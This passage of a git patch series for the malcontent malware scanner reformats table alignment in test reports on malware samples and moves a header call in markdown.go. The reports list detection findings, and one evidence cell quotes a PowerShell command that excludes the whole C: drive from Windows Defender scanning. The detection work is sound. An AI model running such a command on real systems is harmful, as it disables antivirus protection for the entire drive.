@@ -3,14 +3,14 @@
 ### 2 new behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | +LOW | **[fs/directory/traverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-traverse.yara#fts)** | traverse filesystem hierarchy | [_fts_children](https://github.com/search?q=_fts_children&type=code)<br>[_fts_close](https://github.com/search?q=_fts_close&type=code)<br>[_fts_read](https://github.com/search?q=_fts_read&type=code)<br>[_fts_open](https://github.com/search?q=_fts_open&type=code)<br>[_fts_set](https://github.com/search?q=_fts_set&type=code) |
 | +LOW | **[net/http](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http)** | Uses the HTTP protocol | [http](https://github.com/search?q=http&type=code) |
 
 ### 6 removed behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) |
 | -LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)<br>[x86](https://github.com/search?q=x86&type=code) |
 | -LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https://)<br>[linux](https://github.com/search?q=linux&type=code) |
diff --git a/tests/windows/2024.Sharp/sharpil_RAT.exe.md b/tests/windows/2024.Sharp/sharpil_RAT.exe.md
index 07f632913..7f600012d 100644
--- a/tests/windows/2024.Sharp/sharpil_RAT.exe.md
+++ b/tests/windows/2024.Sharp/sharpil_RAT.exe.md
@@ -1,7 +1,7 @@
 ## windows/2024.Sharp/sharpil_RAT.exe [😈 CRITICAL]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | CRITICAL | [3P/ditekshen/telegramchatbot](https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1293-L1308) | Detects executables using Telegram Chat Bot, by [ditekSHen](https://github.com/ditekshen/detection) | `$s1`<br>`$s2`<br>`$s3`<br>`$s4`<br>`$p1`<br>`$p2`<br>`$p3`<br>`$p4` |
 | HIGH | [net/email/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/email/send.yara#SMTPClient_Send_creds) | sends e-mail with a hardcoded credentials | [NetworkCredential](https://github.com/search?q=NetworkCredential&type=code) |
 | MEDIUM | [c2/addr/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/discord.yara#discord) | may report back to 'Discord' | [Discord](https://github.com/search?q=Discord&type=code) |
diff --git a/tests/windows/2024.aspdasdksa2/Nil.exe.md b/tests/windows/2024.aspdasdksa2/Nil.exe.md
index a552ac1fe..307d00b1c 100644
--- a/tests/windows/2024.aspdasdksa2/Nil.exe.md
+++ b/tests/windows/2024.aspdasdksa2/Nil.exe.md
@@ -1,7 +1,7 @@
 ## windows/2024.aspdasdksa2/Nil.exe [😈 CRITICAL]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | CRITICAL | [impact/degrade/win_defender](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/degrade/win_defender.yara#win_defender_exclusion) | Uses powershell to define Windows Defender exclusions | [powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"](https://github.com/search?q=powershell+-Command+%22Add-MpPreference+-ExclusionPath+%27C%3A%5C%27%22&type=code) |
 | MEDIUM | [anti-behavior/anti_debugger](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/anti-debugger.yara#win_debugger_present) | Detects if process is being executed within a debugger or VM | [UnhandledExceptionFilter](https://github.com/search?q=UnhandledExceptionFilter&type=code)<br>[IsDebuggerPresent](https://github.com/search?q=IsDebuggerPresent&type=code) |
 | MEDIUM | [data/embedded/app_manifest](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/app-manifest.yara#app_manifest) | [Contains embedded Microsoft Windows application manifest](https://learn.microsoft.com/en-us/cpp/build/reference/manifestuac-embeds-uac-information-in-manifest?view=msvc-170) | [requestedExecutionLevel](https://github.com/search?q=requestedExecutionLevel&type=code)<br>[requestedPrivileges](https://github.com/search?q=requestedPrivileges&type=code) |

From da7e7f9458ab4607543edf23f22d2d7aeee29f1e Mon Sep 17 00:00:00 2001
From: egibs <20933572+egibs@users.noreply.github.com>
Date: Thu, 29 May 2025 08:36:52 -0500
Subject: [PATCH 4/4] Move header to table config

Signed-off-by: egibs <20933572+egibs@users.noreply.github.com>
---
 pkg/render/markdown.go | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/pkg/render/markdown.go b/pkg/render/markdown.go
index 8891710f1..e62387a3b 100644
--- a/pkg/render/markdown.go
+++ b/pkg/render/markdown.go
@@ -274,11 +274,11 @@ func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer,
 				Alignment: tw.CellAlignment{Global: tw.AlignLeft},
 			},
 		}),
+		tablewriter.WithHeader([]string{"Risk", "Key", "Description", "Evidence"}),
 		tablewriter.WithRenderer(renderer.NewMarkdown()),
 		tablewriter.WithRendition(tw.Rendition{Symbols: tw.NewSymbols(tw.StyleMarkdown)}),
 		tablewriter.WithRowAutoWrap(0),
 	)
-	table.Header([]string{"Risk", "Key", "Description", "Evidence"})
 	// Add Bulk Data
 	if err := table.Bulk(data); err != nil {
 		return err